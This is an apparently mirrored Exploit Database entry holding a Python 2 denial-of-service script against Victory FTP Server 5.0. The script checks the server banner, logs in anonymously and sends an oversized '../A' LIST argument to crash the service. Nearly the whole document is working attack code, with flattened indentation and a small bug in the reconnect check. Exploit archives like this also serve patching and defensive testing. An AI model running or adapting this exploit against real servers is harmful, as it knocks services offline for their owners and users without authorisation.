Victory FTP Server 5.0 – Denial of Service

• Exploit Database
• 14 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-02-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16230/

• #!/usr/bin/python
  #
  #
  # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  # xxx xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  #xxxxxxxx xxxxxx xxxxxx xxx xxxxxx 
  # xxx xxx xxxxxx xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx
  # xxxxxxxxx xxxxxx xxxxxx xxxxxxxxxxxxx
  #xxxxxx xxx xxxxxx xxxxxx xxxxxxxxx xxxx xxxxxxx
  #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx xx xx xx
  # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxx xxxxxxxxxxxxx
  #
  #
  #[+]Exploit Title: Exploit Denial of Service VicFTPS
  #[+]Date: 02\24\11
  #[+]Author C4SS!0 G0M3S
  #[+]Software Link: http://vicftps.50webs.com/VicFTPS-5.0-bin.zip
  #[+]Version: 5.0
  #[+]Tested On: WIN-XP SP3
  #[+]CVE: N/A
  #[+]Language: Portuguese
  #
  #
  #Author C4SS!0 G0M3S || Cassio Gomes
  #E-mail Louredo_@hotmail.com
  #Site www.x000.org/
  #
  #
  
  
  import socket
  import time
  import os
  import sys
  
  if os.name == 'nt':
  os.system("cls")#SE FOR WINDOWS
  os.system("color 4f")
  else:
  os.system("clear")#SE FOR LINUX
  
  
  def usage():
  print """
  ============================================================
  ============================================================
  ===============Exploit Denial of Service Vicftps 5.0========
  ===============Autor C4SS!0 G0M3S || C\xe1ssio Gomes==========
  ===============E-mail Louredo_@hotmail.com==================
  ===============Site www.x000.org/===========================
  ============================================================
  ============================================================
  """
   
  
  if len(sys.argv)!=3:
  usage()
  print "\t\t[-]Modo de Uso: python %s <Host> <Porta>" % sys.argv[0]
  print "\t\t[-]Exemplo: python %s 192.168.1.2 21" % sys.argv[0]
  sys.exit(0)
  buf = "../A" * (330/4)
  usage()
  print "\t\t[+]Conectando-se Ao Servidor %s\n" % sys.argv[1]
  time.sleep(1)
  try:
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect((sys.argv[1],int(sys.argv[2])))
  print "\t\t[+]Checando se o Servidor e Vulneravel\n"
  time.sleep(1)
  banner = s.recv(2000)
  if((banner.find("VicFTPS"))!=-1):
  print "\t\t[+]Servidor e Vulneravel:)\n"
  time.sleep(1)
  else:
  print "\t\t[+]Sinto Muito, Servidor Nao e Vulneravel:(\n"
  time.sleep(1)
  print "\t\t[+]Enviando Exploit Denial of Service\n"
  time.sleep(1)
  
  s.send("USER anonymous\r\n")
  s.recv(2000)
  s.send("PASS\r\n")
  s.recv(2000)
  s.send("LIST "+buf+"\r\n")
  print "\t\t[+]Exploit Enviado Com Sucesso ao Servidor "+sys.argv[1]+"\n"
  time.sleep(1)
  print "\t\t[+]Checando Se o Exploit Funcionou\n"
  time.sleep(1)
  try:
   sock = socket.socket(socket.AF_INET,sock.SOCK_STREAM)
   s.connect((sys.argv[1],int(sys.argv[2])))
   print "\t\t[+]Sinto Muito o Exploit Nao Funcionou:(\n"
   time.sleep(1) 
   sys.exit(0)
  except:
  print "\t\t[+]Exploit Funcionou, Servidor Derrubado:)\n"
  time.sleep(1)
  
  
  except:
  print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n"